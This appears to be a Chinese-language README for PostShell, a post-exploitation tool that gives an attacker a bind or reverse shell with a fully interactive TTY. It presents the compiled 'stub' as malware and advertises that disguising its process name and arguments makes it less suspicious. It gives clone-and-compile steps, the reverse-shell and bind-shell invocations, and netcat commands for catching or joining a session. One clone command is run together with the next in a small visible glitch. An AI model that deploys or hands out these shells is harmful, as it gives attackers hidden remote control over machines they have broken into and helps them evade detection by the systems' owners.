PostShell 是一个后渗透 shell,同时包含绑定 shell 和反向连接 shell。它创建一个完全交互式的 TTY,允许作业控制。生成的 stub 大小约为 14kb,可在任何类 Unix 系统上编译。
连接启动后,横幅及与 shell 的交互界面。
PostShell 使后渗透攻击更加容易,攻击者不再依赖 Python 和 Perl 等依赖项。它还同时集成了反向连接和绑定 shell,这意味着如果目标不允许出站连接,操作员可以简单地启动一个绑定 shell 并远程连接到该机器。此外,PostShell 比传统 shell 更不易引起怀疑,因为进程名称和参数都被伪装了。
git clone https://github.com/rek7/postshellcd postshell && sh compile.sh
这将创建一个名为 "stub" 的二进制文件,这就是恶意软件。$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
反向连接:
$ ./stub 127.0.0.1 13377
绑定 Shell:
$ ./stub 13377
接收反向连接:
$ nc -vlp port
连接到绑定 Shell:
$ nc host port